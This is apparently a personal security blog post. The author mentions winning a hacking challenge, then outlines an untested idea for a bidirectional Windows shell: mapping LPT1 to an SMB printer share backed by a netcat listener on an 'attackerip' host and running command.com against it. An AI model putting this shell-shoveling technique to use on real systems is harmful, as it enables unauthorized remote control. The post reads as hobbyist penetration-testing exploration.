First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge. When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs". Thanks to Ed for putting together a fun challenge. I always learn a lot any time I do anything related to Jedi Master Skoudo.
THEN I see this entry on Wesley's blog on pretending to be a printer with netcat. It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back in April 08. Using that technique I was able to shovel command output to netcat running on an arbitrary port. But I really want a bidirectional interactive shell. The thought is this:
1) Share a netcat listener on my linux box over SMB.
2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled.
3) Net use lpt1 \\attackerip\netcatshare
4) command.com lpt1
command.com (the 16-bit predecessor to CMD.EXE) allows you to redirect I/O to a device. Seems like it should work. This should be fun.